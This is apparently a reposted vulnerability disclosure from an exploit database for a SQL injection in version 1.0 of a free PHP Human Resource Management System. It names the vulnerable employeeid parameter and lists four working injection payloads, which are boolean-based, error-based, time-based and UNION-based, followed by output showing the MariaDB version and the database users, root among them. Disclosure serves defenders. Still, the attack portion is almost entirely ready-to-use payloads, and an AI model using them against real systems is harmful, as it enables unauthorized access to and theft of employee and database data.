Human Resource Management System 1.0 SQL Injection
2024-3-14 05:58:6 Author: cxsecurity.com(查看原文) 阅读量:16 收藏

Human Resource Management System 1.0 SQL Injection

# Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads successfully identified SQL injection vulnerabilities: employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT 7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION ALL SELECT NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - * # Response:MySQL: 10.4.32-MariaDB Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024030029
如有侵权请联系:admin#unsafe.sh